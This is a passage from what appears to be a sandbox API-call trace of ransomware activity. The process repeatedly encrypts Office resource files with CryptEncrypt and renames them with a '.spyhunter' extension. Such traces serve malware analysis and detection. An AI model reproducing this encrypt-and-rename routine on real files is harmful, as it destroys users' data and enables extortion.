lpNumberOfBytesRead=0x57ef14*=0x2800, lpOverlapped=0x0) returned 1 [0146.049] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.049] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ef14*=0x2800, lpOverlapped=0x0) returned 1 [0146.049] GetProcessHeap () returned 0x2c0000 [0146.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0146.049] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.050] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef14, lpOverlapped=0x0 | out: lpBuffer=0x57ef54*, lpNumberOfBytesWritten=0x57ef14*=0x4, lpOverlapped=0x0) returned 1 [0146.057] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef14, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef14*=0x30, lpOverlapped=0x0) returned 1 [0146.057] CloseHandle (hObject=0x9c) returned 1 [0146.057] GetProcessHeap () returned 0x2c0000 [0146.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.057] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.spyhunter") returned 86 [0146.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll.spyhunter")) returned 1 [0146.058] GetProcessHeap () returned 0x2c0000 [0146.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.058] GetProcessHeap () returned 0x2c0000 [0146.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.058] GetProcessHeap () returned 0x2c0000 [0146.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31000 | out: hHeap=0x2c0000) returned 1 [0146.058] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef58 | out: pbBuffer=0x57ef58) returned 1 [0146.058] GetProcessHeap () returned 0x2c0000 [0146.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.058] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef50*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef50*=0x30) returned 1 [0146.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.059] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll") returned 73 [0146.059] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.059] GetProcessHeap () returned 0x2c0000 [0146.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0146.059] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ef14*=0x2800, lpOverlapped=0x0) returned 1 [0146.126] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.126] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ef14*=0x2800, lpOverlapped=0x0) returned 1 [0146.126] GetProcessHeap () returned 0x2c0000 [0146.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0146.126] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.127] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef14, lpOverlapped=0x0 | out: lpBuffer=0x57ef54*, lpNumberOfBytesWritten=0x57ef14*=0x4, lpOverlapped=0x0) returned 1 [0146.134] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef14, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef14*=0x30, lpOverlapped=0x0) returned 1 [0146.134] CloseHandle (hObject=0x9c) returned 1 [0146.134] GetProcessHeap () returned 0x2c0000 [0146.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.134] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.spyhunter") returned 83 [0146.135] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll.spyhunter")) returned 1 [0146.135] GetProcessHeap () returned 0x2c0000 [0146.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.135] GetProcessHeap () returned 0x2c0000 [0146.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.135] GetProcessHeap () returned 0x2c0000 [0146.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff66a8 | out: hHeap=0x2c0000) returned 1 [0146.136] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef50 | out: pbBuffer=0x57ef50) returned 1 [0146.136] GetProcessHeap () returned 0x2c0000 [0146.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.136] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef48*=0x30) returned 1 [0146.136] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.136] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll") returned 76 [0146.136] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.136] GetProcessHeap () returned 0x2c0000 [0146.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0146.136] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ef0c*=0x2800, lpOverlapped=0x0) returned 1 [0146.181] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.181] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ef0c*=0x2800, lpOverlapped=0x0) returned 1 [0146.181] GetProcessHeap () returned 0x2c0000 [0146.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0146.181] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.182] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef0c, lpOverlapped=0x0 | out: lpBuffer=0x57ef4c*, lpNumberOfBytesWritten=0x57ef0c*=0x4, lpOverlapped=0x0) returned 1 [0146.183] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef0c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef0c*=0x30, lpOverlapped=0x0) returned 1 [0146.183] CloseHandle (hObject=0x9c) returned 1 [0146.183] GetProcessHeap () returned 0x2c0000 [0146.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.183] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.spyhunter") returned 86 [0146.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll.spyhunter")) returned 1 [0146.184] GetProcessHeap () returned 0x2c0000 [0146.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.184] GetProcessHeap () returned 0x2c0000 [0146.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.184] GetProcessHeap () returned 0x2c0000 [0146.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f30c60 | out: hHeap=0x2c0000) returned 1 [0146.184] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef50 | out: pbBuffer=0x57ef50) returned 1 [0146.184] GetProcessHeap () returned 0x2c0000 [0146.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.184] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef48*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef48*=0x30) returned 1 [0146.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.185] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll") returned 77 [0146.185] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0146.185] GetProcessHeap () returned 0x2c0000 [0146.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0146.185] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ef0c*=0x2800, lpOverlapped=0x0) returned 1 [0146.191] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.191] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ef0c*=0x2800, lpOverlapped=0x0) returned 1 [0146.191] GetProcessHeap () returned 0x2c0000 [0146.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0146.191] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.191] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef0c, lpOverlapped=0x0 | out: lpBuffer=0x57ef4c*, lpNumberOfBytesWritten=0x57ef0c*=0x4, lpOverlapped=0x0) returned 1 [0146.206] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef0c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef0c*=0x30, lpOverlapped=0x0) returned 1 [0146.206] CloseHandle (hObject=0x9c) returned 1 [0146.206] GetProcessHeap () returned 0x2c0000 [0146.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.206] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.spyhunter") returned 87 [0146.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll.spyhunter")) returned 1 [0146.207] GetProcessHeap () returned 0x2c0000 [0146.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.207] GetProcessHeap () returned 0x2c0000 [0146.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.207] GetProcessHeap () returned 0x2c0000 [0146.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f30a90 | out: hHeap=0x2c0000) returned 1 [0146.207] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef48 | out: pbBuffer=0x57ef48) returned 1 [0146.207] GetProcessHeap () returned 0x2c0000 [0146.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.207] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef40*=0x30) returned 1 [0146.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.208] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll") returned 74 [0146.208] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.208] GetProcessHeap () returned 0x2c0000 [0146.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0146.208] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ef04*=0x2800, lpOverlapped=0x0) returned 1 [0146.237] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.237] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ef04*=0x2800, lpOverlapped=0x0) returned 1 [0146.237] GetProcessHeap () returned 0x2c0000 [0146.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0146.237] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.238] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef04, lpOverlapped=0x0 | out: lpBuffer=0x57ef44*, lpNumberOfBytesWritten=0x57ef04*=0x4, lpOverlapped=0x0) returned 1 [0146.238] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef04, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef04*=0x30, lpOverlapped=0x0) returned 1 [0146.238] CloseHandle (hObject=0x9c) returned 1 [0146.238] GetProcessHeap () returned 0x2c0000 [0146.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.239] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.spyhunter") returned 84 [0146.239] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll.spyhunter")) returned 1 [0146.240] GetProcessHeap () returned 0x2c0000 [0146.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.240] GetProcessHeap () returned 0x2c0000 [0146.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.240] GetProcessHeap () returned 0x2c0000 [0146.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff6168 | out: hHeap=0x2c0000) returned 1 [0146.240] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef48 | out: pbBuffer=0x57ef48) returned 1 [0146.240] GetProcessHeap () returned 0x2c0000 [0146.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.240] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef40*=0x30) returned 1 [0146.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.241] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll") returned 77 [0146.241] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".txt") returned 0x0 [0146.241] GetProcessHeap () returned 0x2c0000 [0146.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0146.241] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ef04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ef04*=0x2800, lpOverlapped=0x0) returned 1 [0146.287] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.287] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ef04, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ef04*=0x2800, lpOverlapped=0x0) returned 1 [0146.287] GetProcessHeap () returned 0x2c0000 [0146.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0146.287] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.287] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ef04, lpOverlapped=0x0 | out: lpBuffer=0x57ef44*, lpNumberOfBytesWritten=0x57ef04*=0x4, lpOverlapped=0x0) returned 1 [0146.300] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ef04, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57ef04*=0x30, lpOverlapped=0x0) returned 1 [0146.300] CloseHandle (hObject=0x9c) returned 1 [0146.300] GetProcessHeap () returned 0x2c0000 [0146.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.300] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.spyhunter") returned 87 [0146.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll.spyhunter")) returned 1 [0146.301] GetProcessHeap () returned 0x2c0000 [0146.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.301] GetProcessHeap () returned 0x2c0000 [0146.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0146.301] GetProcessHeap () returned 0x2c0000 [0146.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f308c0 | out: hHeap=0x2c0000) returned 1 [0146.301] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ef40 | out: pbBuffer=0x57ef40) returned 1 [0146.301] GetProcessHeap () returned 0x2c0000 [0146.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0146.301] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57ef38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57ef38*=0x30) returned 1 [0146.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0146.302] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll") returned 75 [0146.302] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0146.302] GetProcessHeap () returned 0x2c0000 [0146.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0146.302] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eefc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eefc*=0x2800, lpOverlapped=0x0) returned 1 [0146.390] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.390] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eefc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eefc*=0x2800, lpOverlapped=0x0) returned 1 [0146.391] GetProcessHeap () returned 0x2c0000 [0146.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0146.391] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.391] WriteFile (in: hFile=0x9c, lpBuffer=0x57ef3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eefc, lpOverlapped=0x0 | out: 